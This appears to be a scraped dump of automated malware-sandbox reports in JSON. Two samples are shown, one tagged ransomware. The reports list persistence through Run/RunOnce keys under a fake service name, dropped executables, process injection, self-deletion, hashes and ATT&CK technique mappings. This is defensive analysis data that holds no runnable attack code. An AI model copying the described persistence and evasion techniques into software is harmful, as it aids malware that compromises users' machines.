\"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000005\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000006\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000007\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000008\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000009\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "string-64", "type": 2, "relevance": 10, "name": "Input file contains API references not part of its Import Address Table (IAT)", "description": "Found string \"system\" (Source: 3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f, API is part of module: MSVCRT.DLL)\n Found string \"shutdown\" (Source: 3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f, API is part of module: WS2_32.DLL)", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-60", "relevance": 10, "name": "PE file contains unusual section name", "description": "\"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f\" has a section named \".eh_fram\"\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f\" has a section named \".CRT\"\n \"085cda53603755dc.exe\" has a section named \".eh_fram\"\n \"085cda53603755dc.exe\" has a section named \".CRT\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-8", "relevance": 10, "name": "Sample translates to unusual binary language", "description": "Russian (ID: 0x0419)", "origin": "Static Parser"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "registry-0", "type": 3, "relevance": 8, "name": "Modifies auto-execute functionality by setting/creating a value in the registry", "description": "\"085cda53603755dc.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\")\n \"085cda53603755dc.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"SYSTEM HEALTH MONITORING SERVICE PRO\"; Value: \"\"%TEMP%\\085cda53603755dc.exe\"\")\n \"085cda53603755dc.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE\")\n \"085cda53603755dc.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE\"; Key: \"*SYSTEM HEALTH MONITORING SERVICE PRO\"; Value: \"\"%TEMP%\\085cda53603755dc.exe\"\")", "origin": "Registry Access", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"085cda53603755dc.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows\"- Location: [%TEMP%\\085cda53603755dc.exe]- [targetUID: 00000000-00002920]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" wrote 16236 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f\" has section name .text with entropy \"6.12526528121\"\n \"085cda53603755dc.exe\" has section name .text with entropy \"6.12526528121\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Ransomware/Banking", "identifier": "registry-9", "type": 3, "relevance": 7, "name": "Checks warning level of secure to non-secure traffic redirection", "description": "\"085cda53603755dc.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"WARNONHTTPSTOHTTPREDIRECT\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-136", "type": 3, "relevance": 3, "name": "Writes registry keys", "description": "\"085cda53603755dc.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"SYSTEM HEALTH MONITORING SERVICE PRO\"; Value: \"\"%TEMP%\\085cda53603755dc.exe\"\")\n \"085cda53603755dc.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE\"; Key: \"*SYSTEM HEALTH MONITORING SERVICE PRO\"; Value: \"\"%TEMP%\\085cda53603755dc.exe\"\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"085cda53603755dc.exe\" marked \"C:\\3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"085cda53603755dc.exe\" opened \"C:\\3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 196)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 196)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 196)\n \"085cda53603755dc.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 220)\n \"085cda53603755dc.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 220)\n \"085cda53603755dc.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 220)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-20", "type": 6, "relevance": 7, "name": "Allocates virtual memory in a remote process", "description": "\"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" allocated memory in \"C:\\3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\"", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303
https://hybrid-analysis.com/sample/f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303
Hybrid Analysis - Ransomware
{"size": 606108, "type": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows", "submit_name": "f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303", "sha256": "f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303", "av_detect": 87, "vx_family": "Trojan.Generic", "threat_score": 85, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 3, "total_signatures": 141, "extracted_files": [{"name": "085cda53603755dc.exe", "file_path": "%TEMP%\\085cda53603755dc.exe", "file_size": 606112, "sha256": "0e8992a5681118a464d03f63a0db4a2cd68ecfb073a0f6ab64a3287e29b18815", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows", "runtime_process": "085cda53603755dc.exe (PID: 2876)", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00002904", "name": "f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe", "normalized_path": "C:\\f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe", "sha256": "f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303", "av_label": "Trojan.Generic", "av_matched": 14, "av_total": 22}, {"uid": "00000000-00002876", "parentuid": "00000000-00002904", "name": "085cda53603755dc.exe", "normalized_path": "%TEMP%\\085cda53603755dc.exe", "command_line": ":*C:\\f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe *", "sha256": "0e8992a5681118a464d03f63a0db4a2cd68ecfb073a0f6ab64a3287e29b18815"}, {"uid": "00000000-00002996", "parentuid": "00000000-00002876", "name": "085cda53603755dc.exe", "normalized_path": "%TEMP%\\085cda53603755dc.exe", "command_line": "a ZZZZZZXRSTG", "sha256": "0e8992a5681118a464d03f63a0db4a2cd68ecfb073a0f6ab64a3287e29b18815"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 3, "informative_identifiers_count": 12}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Thread Local Storage", "attck_id": "T1055.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/005", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 2, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Thread Local Storage", "attck_id": "T1055.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/005", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Safe Mode Boot", "attck_id": "T1562.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 8}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 2, "informative_identifiers_count": 15}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 3, "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 5}, {"tactic": "Command and Control", "technique": "Non-Application Layer Protocol", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 3, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": 